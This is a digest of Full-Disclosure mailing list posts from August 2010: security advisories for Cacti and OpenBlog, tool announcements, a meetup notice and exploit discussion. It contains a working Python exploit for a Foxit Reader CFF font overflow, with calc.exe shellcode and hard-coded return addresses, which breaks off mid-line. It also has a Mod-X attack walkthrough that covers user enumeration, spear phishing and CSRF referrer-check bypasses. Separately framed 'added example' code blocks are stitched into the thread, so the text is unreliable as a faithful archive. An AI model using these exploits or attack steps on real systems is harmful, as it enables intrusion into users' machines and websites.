Re: [Full-disclosure] On the iPhone PDF and kernel exploit

2010-08-24 Thread Jose Miguel Esparza
Robert Święcki wrote:
> On Fri, Aug 6, 2010 at 10:14 AM, Jose Miguel Esparza
> josemiguel.espa...@gmail.com wrote:
>> Hi!
>>
>> I took a look at the PDF some days ago, looking for the PDF vuln, you
>> can see my post about it here:
>>
>> http://eternal-todo.com/blog/jailbreakme-pdf-exploit
>>
>> Anyway, I continue analysing it...
>
> "At the moment there's no available patch so it's recommended
> some type of mitigation and to be careful with the visited
> links"
>
> The fix seems to be here:
> http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=11d65e8a1f1f14e56148fd991965424d9bd1cdbc
> (http://www.kb.cert.org/vuls/id/275247)
>
> I wonder if this was in any way inspired by my previous bugreport in
> June (the same piece of code, slightly different attack vector).
>
> https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2497
> http://savannah.nongnu.org/bugs/index.php?30083
>
> Maybe, maybe not..

Hi,

I forgot to update this thread; it may be late, but I'm adding more info about 
it, more concretely about the way the Type2 operands work and how this 
vulnerability can be exploited...

http://eternal-todo.com/blog/more-jailbreakme-pdf-exploit

Robert, I think it's not the same bug because yours is related to an 
integer overflow, isn't it?

-- 
Jose Miguel Esparza
http://eternal-todo.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Athena SSL Cipher Scanner

2010-08-24 Thread Darren McDonald
I've posted a new SSL cipher tool on my website, at
http://dmcdonald.net/athena-ssl-cipher-check_v052.tar.gz, Athena SSL Cipher
Scanner.

Unlike most SSL cipher scanners, which have a limited list of ciphers they
know of, athena checks all 65536 cipher codes. Of these codes it can
identify ~150 different ciphers; if it finds a cipher which it cannot
identify, it'll just inform you that it has found an unknown cipher. Rather
than sending 65536 requests to find these ciphers, it sends large blocks
of cipher codes and uses the server response to narrow down its search,
similar to a binary search algorithm. It can scan most SSL services in a
couple of minutes or so. Further speed improvements are in the pipeline.

It currently works very well with IIS and Apache, but seems to have issues
with Sun HTTP Servers, the reasons behind which I've not yet fully explored.
Note I've reimplemented parts of SSLv2, SSLv3 and TLS1, and for all I know
I've got it wrong and it could completely hose your box; use with caution in
live environments.

I'd be grateful for any feedback/bugs/comments.

Best,

Renski
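The block-and-narrow strategy the post describes, as an added example in Python (this is not Athena's code). The server is a constructed stand-in for a TLS endpoint: it selects the first offered suite it supports, in its own preference order, and fails the handshake when there is no overlap or the ClientHello is oversized. The preference list, the 0xFF01 private-range code standing in for an "unknown cipher", and the block size are all assumptions; the five named suite codes are real IANA assignments.

```python
"""Added example (not Athena's code): enumerate a server's cipher suites by
offering whole blocks of suite codes and letting the ServerHello prune the
search.  The server below is a constructed stand-in; nothing touches the
network."""

# A ClientHello's cipher_suites field holds at most 2^16-2 bytes, two bytes
# per suite, so the full 16-bit code space never fits in a single hello.
MAX_SUITES_PER_HELLO = 32767

# Constructed server preference list: real IANA codes plus one code from the
# private-use range (0xFF01) standing in for a suite the scanner cannot name.
FAKE_SERVER_PREFS = [0xC02F, 0x009C, 0x002F, 0x000A, 0x0035, 0xFF01]

KNOWN_SUITES = {
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
}


def fake_server_hello(offered, prefs=FAKE_SERVER_PREFS):
    """Suite the server selects for this ClientHello, or None on failure."""
    if len(offered) > MAX_SUITES_PER_HELLO:
        return None                      # oversized hello, handshake aborted
    offered_set = set(offered)
    for code in prefs:                   # server preference order
        if code in offered_set:
            return code
    return None                          # no shared suite


def enumerate_suites(probe, block_size=4096):
    """Offer each block of codes repeatedly, dropping the suite the server
    chose each time, until the block is rejected.  Cost is one probe per
    supported suite plus one rejection per block, instead of 65536
    single-suite hellos.  Returns (codes in discovery order, probes sent)."""
    supported, probes = [], 0
    for start in range(0, 0x10000, block_size):
        block = list(range(start, min(start + block_size, 0x10000)))
        while block:
            probes += 1
            chosen = probe(block)
            if chosen is None:
                break                    # nothing (left) in this block
            supported.append(chosen)
            block.remove(chosen)         # narrow: never offer it again
    return supported, probes


def describe(codes):
    """Map codes to names, flagging the ones the scanner cannot identify."""
    return [(c, KNOWN_SUITES.get(c, "unknown cipher")) for c in codes]


if __name__ == "__main__":
    found, n = enumerate_suites(fake_server_hello)
    for code, name in describe(found):
        print("0x%04X  %s" % (code, name))
    print("%d suites found with %d probes" % (len(found), n))
```

Against the constructed server this finds all six suites in 22 probes (4096-code blocks), while a single 65536-suite hello is simply rejected, which is why the block size matters. Real servers can also reject a large hello for reasons that have nothing to do with the suites in it (record size limits, SSLv2-style hellos), and a scanner that treats every failure as "no suite in this block" will then silently under-report; that is the sort of behaviour worth checking when a server class misbehaves as the post reports for Sun HTTP Server.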

[Full-disclosure] WinAppDbg 1.4 is out!

2010-08-24 Thread Mario Vilas
What is WinAppDbg?
==================

The WinAppDbg python module allows developers to quickly code instrumentation
scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides
an object-oriented abstraction layer to manipulate threads, libraries and
processes, attach your script as a debugger, trace execution, hook API calls,
handle events in your debuggee and set breakpoints of different kinds (code,
hardware and memory). Additionally it has no native code at all, making it
easier to maintain or modify than other debuggers on Windows.

The intended audience is QA engineers and software security auditors wishing to
test / fuzz Windows applications with quickly coded Python scripts. Several
ready-to-use utilities are shipped and can be used for these purposes.

Current features also include disassembling x86 native code (using the open
source diStorm project, see http://ragestorm.net/distorm/), debugging multiple
processes simultaneously and producing a detailed log of application crashes,
useful for fuzzing and automated testing.


What's new in this version?
===========================

In a nutshell...

 * fully supports Python 2.4 through 2.7
 * fully supports Windows XP through Windows 7, 32 and 64 bit editions
 * crash report tool now supports MSSQL (requires pyodbc)
 * now supports downloading debugging symbols from Microsoft (thanks Neitsa!)
 * new tool: sehtest.py (Windows SEH buffer overflow jump address bruteforcer,
   inspired by the same tool by Nicolas Economou)
 * the tutorial is now available in chm and pdf formats
 * now with only one MSI installer for all supported Python versions
 * added support for diStorm 3 (falls back to the old version if not found)
 * now using cerealizer instead of pickle whenever possible
 * added new command to the command line debugger to show the SEH chain
 * a few more anti-anti-debug tricks were added, still more to go!
 * several improvements to the Window instrumentation classes
 * more code examples
 * more Win32 API wrappers
 * lots of miscellaneous improvements, more documentation and bugfixes as usual!

Entire changelog for all versions (slow!):

  http://p.sf.net/winappdbg/changelog


Where can I find WinAppDbg?
===========================

Project homepage:
-----------------

http://tinyurl.com/winappdbg

Download links:
---------------

  Windows installer (32 bits)

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.exe/download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.msi/download

  Windows installer (64 bits)

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.exe/download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.msi/download

  Source code

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.zip/download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.tar.bz2/download

Documentation:
--------------

  Online
http://winappdbg.sourceforge.net/doc/v1.4/tutorial
http://winappdbg.sourceforge.net/doc/v1.4/reference

  For download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.chm/download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.chm/download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.pdf/download

http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.pdf/download



[Full-disclosure] London DEFCON - DC4420 - August meet - Wednesday 25th August 2010

2010-08-24 Thread Major Malfunction
allegedly, it's that time of the month again...

as all our speakers are either dying from strep throat having spent more 
hours than is medically advisable in the company of desert heat and/or 
air conditioning, or are sunning themselves on some far away beach where 
dc4420 is the last thing on their minds, this month will be largely a 
social, where you get to buy me beer, interrupted only by a couple of 
lightning talks should the urge to speak overwhelm one or more of you...

oh look, we have a volunteer already! alien will explain why chicago 
should absolutely positively be the last place you transit through on 
the way to vegas, and what happened when he got there...

venue:

 Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH
 http://tinyurl.com/dc4420-venue

nearest stations:

Tottenham Court Road London Underground station (150m) - zone 1
Goodge Street London Underground station (440m) - zone 1
Oxford Circus London Underground station (630m) - zone 1
Leicester Square London Underground station (680m) - zone 1
Covent Garden London Underground station (750m) - zone 1

kickoff:

 Wed 25th August 2010
 room ours from 18:00, talks start at 19:30
 kitchen closes at 21:30
 last orders 23:00

see you all there!

http://dc4420.org

cheers,
MM
-- 
In DEFCON, we have no names... errr... well, we do... but silly ones...



[Full-disclosure] [ MDVSA-2010:160 ] cacti

2010-08-24 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:160
 http://www.mandriva.com/security/
 ___

 Package : cacti
 Date: August 24, 2010
 Affected: Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in cacti:
 
 Multiple cross-site scripting (XSS) vulnerabilities in Cacti before
 0.8.7f, allow remote attackers to inject arbitrary web script or
 HTML via the (1) hostname or (2) description parameter to host.php,
 or (3) the host_id parameter to data_sources.php (CVE-2010-1644).
 
 Cacti before 0.8.7f, allows remote authenticated administrators to
 execute arbitrary commands via shell metacharacters in (1) the FQDN
 field of a Device or (2) the Vertical Label field of a Graph Template
 (CVE-2010-1645).
 
 Cross-site scripting (XSS) vulnerability in
 include/top_graph_header.php in Cacti before 0.8.7g allows remote
 attackers to inject arbitrary web script or HTML via the graph_start
 parameter to graph.php.  NOTE: this vulnerability exists because of
 an incorrect fix for CVE-2009-4032.2.b (CVE-2010-2543).
 
 Cross-site scripting (XSS) vulnerability in utilities.php in Cacti
 before 0.8.7g, allows remote attackers to inject arbitrary web script
 or HTML via the filter parameter (CVE-2010-2544).
 
 Multiple cross-site scripting (XSS) vulnerabilities in Cacti before
 0.8.7g, allow remote attackers to inject arbitrary web script or HTML
 via (1) the name element in an XML template to templates_import.php;
 and allow remote authenticated administrators to inject arbitrary web
 script or HTML via vectors related to (2) cdef.php, (3) data_input.php,
 (4) data_queries.php, (5) data_sources.php, (6) data_templates.php, (7)
 gprint_presets.php, (8) graph.php, (9) graphs_new.php, (10) graphs.php,
 (11) graph_templates_inputs.php, (12) graph_templates_items.php,
 (13) graph_templates.php, (14) graph_view.php, (15) host.php, (16)
 host_templates.php, (17) lib/functions.php, (18) lib/html_form.php,
 (19) lib/html_form_template.php, (20) lib/html.php, (21)
 lib/html_tree.php, (22) lib/rrd.php, (23) rra.php, (24) tree.php,
 and (25) user_admin.php (CVE-2010-2545).
 
 This update provides cacti 0.8.7f, which is not vulnerable to these
 issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1644
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1645
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2543
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2544
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2545
 ___

 Updated Packages:

 Corporate 4.0:
 4134297861a2b57c17204497c8e474d1  
corporate/4.0/i586/cacti-0.8.7g-0.1.20060mlcs4.noarch.rpm 
 df74ca45bbe47160463f323828953474  
corporate/4.0/SRPMS/cacti-0.8.7g-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 e61de1b8ead28de422c10643f60d3f91  
corporate/4.0/x86_64/cacti-0.8.7g-0.1.20060mlcs4.noarch.rpm 
 df74ca45bbe47160463f323828953474  
corporate/4.0/SRPMS/cacti-0.8.7g-0.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 7c9ae55dc3374c1c7fa848764447cf11  
mes5/i586/cacti-0.8.7g-0.1mdvmes5.1.noarch.rpm 
 ab0da7a454014b307109c50308b5ab9f  mes5/SRPMS/cacti-0.8.7g-0.1mdvmes5.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 fcda5deb37036ee6c5a784501ec32e70  
mes5/x86_64/cacti-0.8.7g-0.1mdvmes5.1.noarch.rpm 
 ab0da7a454014b307109c50308b5ab9f  mes5/SRPMS/cacti-0.8.7g-0.1mdvmes5.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMc6POmqjQ0CJFipgRAkUlAKDjSxc8B91AXSLUGYMFRdAKMwF8wQCfWrJs
OUFj7V09JyDhxeSAoB3w86k=
=LNa+
-END PGP SIGNATURE-


[Full-disclosure] Exploit for Foxit Reader = 4.0 (CVE-2010-1797 - PDF Jailbreakme vuln)

2010-08-24 Thread Jose Miguel Esparza

Hi,

I haven't seen the proof of concept for this vuln affecting Foxit Reader 
published, so I'm attaching it. It carries a calc.exe shellcode, tested on 
Windows XP and Windows Vista.



Cheers!


--
Jose Miguel Esparza
http://eternal-todo.com
import sys,zlib

def getFFShellcode(sc):
   # Wrap the shellcode as Type2 charstring 0xFF (5-byte) number operands:
   # pad to a multiple of 4, then emit 0xFF followed by each 4-byte chunk
   # byte-reversed, so the big-endian operand value lands in memory as the
   # original little-endian shellcode bytes once the interpreter pushes it.
   ff_sc = ''
   if len(sc)%4 != 0:
      sc += (4-len(sc)%4)*'\x00' 
   for i in range(0,len(sc),4):
      ff_sc += '\xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i]
   return ff_sc 

outputHeader = '''
##
# FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797)#
##
##
# Product: Foxit Reader <= 4.0   #
# Platforms: Windows XP, Windows Vista   #
# Author: Jose Miguel Esparza jesparza AT eternal-todo DOT com #
# Web: http://eternal-todo.com   #
# Date: 2010-08-23   #
##
##
'''
outputFileName = 'foxit_type2_poc.pdf'
usage = 'Usage: '+sys.argv[0]+' target\n\nTargets:\n\t0 - Foxit Reader > 3.0\n\t1 - Foxit Reader 3.0\n\t2 - Other versions'

COMEX_PDF_TEMPLATE = '''%PDF-1.3
%\xbe\xbe\xba\xba
4 0 obj
<< /Length 631 >>
stream
q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc
7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q 
1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta)
-0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4
( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT
-0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( ) 
-1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc
18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm
/F2.0 1 Tf ( ) Tj ET Q Q 
endstream
endobj
2 0 obj
<< /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792]
>>
endobj
5 0 obj
<< /ProcSet [ /PDF /Text ] /ColorSpace << /Cs1 6 0 R >> /Font << /F2.0 8 0 R >> >>
endobj
3 0 obj
<< /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] >>
endobj
7 0 obj
<< /Type /Catalog /Pages 3 0 R >>
endobj
11 0 obj
<<
/Subtype/Type1C
/Filter[/FlateDecode]
/Length $CFF_STREAM_LENGTH
>>
stream
$CFF_STREAM
endstream
endobj
9 0 obj
<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R >>
endobj
10 0 obj
[ 556 ]
endobj
8 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor
9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding
>>
endobj
1 0 obj
<< >>
endobj
xref
0 12
00 65535 f
017767 0 n
000408 0 n
003397 0 n
22 0 n
000389 0 n
000512 0 n
003361 0 n
017359 0 n
007240 0 n
000622 0 n
003340 0 n
trailer
<< /Size 12 /Root 7 0 R /Info 1 0 R >>
startxref
17942
%%EOF
'''

MAX_FF_SECTION_LEN = 45*5
JUMP_BYTE = ['\xcd','\xcc']
POP_POP_RET_ADDRESS = ['\x00\x40\x11\x85','\x00\x40\xce\x36'] # Foxit reader addresses, depending on the version
NUM_SECOND_INSTRUCTIONS_SET = [183,182]

# calc.exe shellcode
shellcode = '\x68\x10\xf5\x00\x00\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x58\x66\x3b\xd0\x50\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\x66\x3d\x10\xf5\x75\x0e\x33\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xff\xd5\x68\x06\xcb\x00\x00\xeb\x92'

cff_header = '\x01\x00\x04\x01\x00\x01\x01\x01\x13ABCDEF+Times-Roman\x00\x01\x01\x01\x1f\xf8\x1b\x00\xf8\x1c\x02\xf8\x1d\x03\xf8\x19\x04\x1co\x00\r\xfb\xfbn\xfa|\xfa\x16\x05\xe9\x11\x8b\x8b\x12\x00\x03\x01\x01\x08\x13\x18001.007Times RomanTimes\x00\x00\x00\x02\x04\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x04\xdc'

if len(sys.argv) > 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1:
   sys.exit(usage)

version = int(sys.argv[1])
if version == 2:
   sys.exit('Versions < 3.0 are not implemented, try it!! ;)\n')
if version > 2:
   sys.exit(usage)

print outputHeader
print '[-] Creating PDF file...'
# Building the FF section
ff_shellcode = getFFShellcode(shellcode)
ff_zero_bytes = 
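Jose's earlier message in this digest refers to "the way the Type2 operands work", and the PoC's getFFShellcode() above relies on exactly that. The following is an added example in Python 3, not the PoC's code and not FreeType's: a Type 2 charstring number encoder/decoder written from the Type 2 charstring format spec, the same 0xFF-wrapping transform, and a view of the resulting operand stack as it sits in memory on a little-endian host that keeps each operand in a 32-bit slot (FreeType's CFF decoder stores operands as FT_Fixed). The "shellcode" bytes are constructed filler. It also checks the spec's 48-entry argument-stack limit; the PoC's MAX_FF_SECTION_LEN = 45*5 is 45 such five-byte operands per section, i.e. under that limit.

```python
"""Added example (not the PoC's code, not FreeType's): Type 2 charstring
number operands, and why wrapping 4-byte shellcode chunks behind 0xFF with
the bytes reversed rebuilds the shellcode on the interpreter's stack."""
import struct

TYPE2_MAX_STACK = 48   # argument stack limit in the Type 2 charstring spec


def encode_number(v):
    """Shortest Type 2 encoding of an integer operand (spec section 3.2)."""
    if -107 <= v <= 107:
        return bytes([v + 139])                        # one byte: 32..246
    if 108 <= v <= 1131:
        v -= 108
        return bytes([(v >> 8) + 247, v & 0xFF])       # two bytes: 247..250
    if -1131 <= v <= -108:
        v = -v - 108
        return bytes([(v >> 8) + 251, v & 0xFF])       # two bytes: 251..254
    if -32768 <= v <= 32767:
        return b"\x1c" + struct.pack(">h", v)          # 28 + int16
    # 0xFF + 32-bit big-endian value (the spec reads it as 16.16 fixed point)
    return b"\xff" + struct.pack(">i", v)


def parse_charstring(cs):
    """Walk a charstring and return (operand stack, operators).  Operators are
    recorded but, unlike a real interpreter, do not clear the stack, so the
    whole operand sequence stays visible."""
    stack, ops, i = [], [], 0
    while i < len(cs):
        b0 = cs[i]
        if 32 <= b0 <= 246:
            stack.append(b0 - 139); i += 1
        elif 247 <= b0 <= 250:
            stack.append((b0 - 247) * 256 + cs[i + 1] + 108); i += 2
        elif 251 <= b0 <= 254:
            stack.append(-(b0 - 251) * 256 - cs[i + 1] - 108); i += 2
        elif b0 == 28:
            stack.append(struct.unpack(">h", cs[i + 1:i + 3])[0]); i += 3
        elif b0 == 255:
            stack.append(struct.unpack(">i", cs[i + 1:i + 5])[0]); i += 5
        elif b0 == 12:
            ops.append((12, cs[i + 1])); i += 2        # escaped operator
        else:
            ops.append((b0,)); i += 1                  # plain operator
    return stack, ops


def pack_as_ff_operands(shellcode):
    """Same transform as the PoC's getFFShellcode(): pad to a multiple of 4,
    then emit 0xFF followed by each chunk byte-reversed."""
    padded = shellcode + b"\x00" * (-len(shellcode) % 4)
    return b"".join(b"\xff" + padded[i:i + 4][::-1]
                    for i in range(0, len(padded), 4))


def stack_memory_image(stack):
    """Bytes of the operand stack as laid out by an interpreter with 32-bit
    slots on a little-endian host: the reversal above cancels out and the
    slots hold the original shellcode bytes in order."""
    return struct.pack("<%di" % len(stack), *stack)


def fits_in_type2_stack(stack):
    """True while the operand count stays within the spec's 48-entry limit."""
    return len(stack) <= TYPE2_MAX_STACK


if __name__ == "__main__":
    filler = bytes(range(0x01, 0x0B))          # constructed 10-byte stand-in, not shellcode
    stack, _ = parse_charstring(pack_as_ff_operands(filler))
    print("%d operands, within stack limit: %s" % (len(stack), fits_in_type2_stack(stack)))
    print("stack memory image:", stack_memory_image(stack).hex())
```

Running it shows three 0xFF operands whose memory image is the ten filler bytes followed by two bytes of padding, which is the property the PoC depends on: the charstring carries opaque numbers, but the interpreter's operand array ends up holding the shellcode verbatim. The 48-entry check is the spec's bound, nothing more; what FreeType actually did with operand counts in the affected version is not covered by this example.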

Re: [Full-disclosure] [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog

2010-08-24 Thread Henri Salo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Mon, 23 Aug 2010 10:36:42 +0700
Bkis min...@bkav.com.vn wrote:

> [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog
> 
> 1. General Information
> 
> OpenBlog is free software for developing a blogging platform.
> OpenBlog is written in PHP and available at
> http://www.open-blog.info. In August 2010, Bkis Security discovered
> some XSS and CSRF vulnerabilities in this software; especially, there is
> a vulnerability which might allow privilege elevation in OpenBlog
> 1.2.1. Taking advantage of this vulnerability, a hacker might execute
> malicious code in the user's browser or even get control of the blog. Bkis
> has sent its warning to the developer.
> 
> Details: http://security.bkis.com/?p=1382
> SVRT Advisory: Bkis-04-2010
> Initial vendor notification: 08/09/2010
> Release Date: 08/23/2010
> Update Date: 08/23/2010
> Discovered by: Duong Manh Linh, Truong Tu Hai, Nguyen Hoang Vinh - Bkis
> Attack Type: Bypass Authentication, XSS, CSRF
> Security Rating: High
> Impact: Code Execution
> Affected Software: Openblog v1.2.1
> 
> 2. Technical Details
> 
> The most dangerous vulnerability resides in the session module of
> OpenBlog. Exploiting this vulnerability, a hacker can sign in to a normal
> user's account but obtain administrator privileges. This is due to
> a weakness in the user rights checking and authentication mechanism,
> resulting in a high possibility of faking administrator
> privileges.
> 
> Besides, Bkis also found some XSS and CSRF vulnerabilities in the
> following OpenBlog functions:
> 
> XSS holes are found in the following modules:
> - Create a new post
> - Edit a post
> - Create a new page
> 
> Because these modules' input variables are not adequately checked and
> filtered, a hacker might insert his code into the path's links. If a
> user logs in to his blog and clicks the link, the hacker's malicious code
> (JavaScript) will be executed, leading to the loss of the user's personal
> information saved in the browser.
> 
> CSRF vulnerabilities are found in the following modules:
> - Edit a user
> - Settings
> - Templates
> - Disable/Enable Sidebar
> - Feed settings
> - Bookmarking
> - New post
> - Edit a post
> - Delete a post
> - New page
> - Edit a page
> - Delete a page
> - New navigation item
> - Edit a navigation item
> - New link
> - Edit a link
> - Delete a link
> - New category
> - Edit a category
> - Delete a category
> - Delete a comment
> - Delete a user
> 
> OpenBlog does not require the user's confirmation when performing the
> above functions. Therefore, users might be tricked into performing
> unwanted actions without their consent, like clicking faulty links,
> etc. Specifically, a hacker might fool the blog's administrators into
> deleting or editing the posts on the blog.
> 
> 3. Solution
> 
> Rating the vulnerability as critical, Bkis recommends that organizations and
> individuals using OpenBlog be cautious with links of unknown origin.
> At the same time, users should keep themselves updated with the
> developer's information to get timely updates.
> 
> 
> --
> Bkis (www.bkis.com)
> Blog (blog.bkis.com)

Do you have CVE-identifier for these vulnerabilities?

Best regards,
Henri Salo
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkxz+OIACgkQXf6hBi6kbk/YUgCfX6TdYIBlXQJe1gSPWZ6Ge/T5
2/oAoLyjKxthFwJXtznB7Eh5xnh/uxK9
=kNMK
-END PGP SIGNATURE-


[Full-disclosure] Mod-X Multiple Vulnerabilities (exploit chaining)

2010-08-24 Thread Tyler Borland
Got bored and decided to break the new website of the company I work for.
Throughout I'll be dropping two new exploits that were chained to allow
changing the administrative password of a default mod-x install.  This is
not a full review of mod-x; my main goal was just to break something, so I
went with the first exploit I found.
If you know me, you know I don't disclose unless you can exploit without
user interaction.  However, I thought this was a cool writeup on how security
mechanisms were bypassed, so I thought I would share.

Did not discover much input that can be manipulated until I ran across a
modx extension called ditto.  Through ditto, I was able to discover a full
path disclosure:
http://www.victim.com/archives?myDittoCall_year=2009&myDittoCall_month=false&myDittoCall_day=false&myDittoCall_start[]=0

Error message:
« MODx Parse Error »
MODx encountered the following error while attempting to parse the requested
resource:
« PHP Parse Error »

PHP error debug
  Error: htmlspecialchars() expects parameter 1 to be string, array
given
  Error type/ Nr.: Warning - 2
  File: /var/www/vhosts/
victim.com/httpdocs/assets/snippets/ditto/classes/ditto.class.inc.php
  Line: 1077
  Line 1077 source: $query[htmlspecialchars($param, ENT_QUOTES)] =
htmlspecialchars($value, ENT_QUOTES);

Parser timing
  MySQL: 0.0022 s(19 Requests)
  PHP: 0.1612 s
  Total: 0.1633 s

Affected code (even though the error is pretty verbose):
foreach ($_GET as $param=>$value) {
    if ($param != 'id' && $param != 'q') {
        $query[htmlspecialchars($param, ENT_QUOTES)] =
            htmlspecialchars($value, ENT_QUOTES);
    }
}

First things first, htmlspecialchars with ENT_QUOTES seems to be messing
with all of our injections.  No charset appears to be specified, let's take
a look at their default charset, perhaps one was specially set.
UTF-8 is default charset, no special reflective injection point.

However, we do have a full path disclosure and we now know that
victim.com is running modx, let's go download that!
*After fscking around, found that they use the Evolution and not the Revolution
version of mod-x*

http://www.victim.com/manager/ - Our login entry point.

Looks like there's no nonce checking so csrf is a viable option after some
modification.  First, let's acquire some sort of username we can use to
manipulate/create users (or something of equal fun).

http://www.victim.com/manager/index.php?action=show_form
Very nice!  The forgot password form is happy to verify if the user exists
via the email or not.  Good chances that the email will be u...@victim.com.
This information can be used to advance our attack.

After a lot of looking around and guessing names I finally ran across a
valid user by looking around the site for contact emails and other
usernames.  Turns out it was a marketing person (+1 SE aid).
After finding a valid user email, I was able to now work on crafting the
exploit and using spear social engineering to exponentially increase the
likelihood of an attack (spear phishing is very successful).

Now, there are all sorts of valid CSRF around.  However, we have a problem.
victim.com/manager/index.php checks referrers.  index.php includes/requires
the actions that we want to have fun with.
a.)  Attack vector 1:  See how strenuous the checks are for the referrer.
Possibly attack a hosted sub-domain or another application (blog?  Open
source apps seem to work together.).
if (!empty($referer)) {
if (!preg_match('/^'.preg_quote(MODX_SITE_URL, '/').'/i',
$referer)) {
b.)  Attack vector 2:  Find a CSRF outside of index.php or directly access
included/required files so referrer check is never executed.  Problem is
direct includes don't work on most of the fun scripts because of:
if (IN_MANAGER_MODE != true)
die("<b>INCLUDE_ORDERING_ERROR</b><br /><br />Please use the MODx
Content Manager instead of accessing this file directly.");
c.)  Attack vector 3:  Somehow get the script on the site.  Not likely
otherwise this would probably never be needed.
d.)  Attack vector 4:  Find an xss to reflect a self-submitting form.
However, protect.inc.php seems to have basic xss protection and is included
in most scripts.
'@<script[^>]*?>.*?</script>@si',
'@&#(\d+);@e',
'@\[\[(.*?)\...@si',
'@\[!(.*?)!...@si',
'@\[\~(.*?)\...@si',
'@\[\((.*?)\)\...@si',
'@{{(.*?)}...@si',
'@\[\+(.*?)\...@si',
'@\[\*(.*?)\...@si'

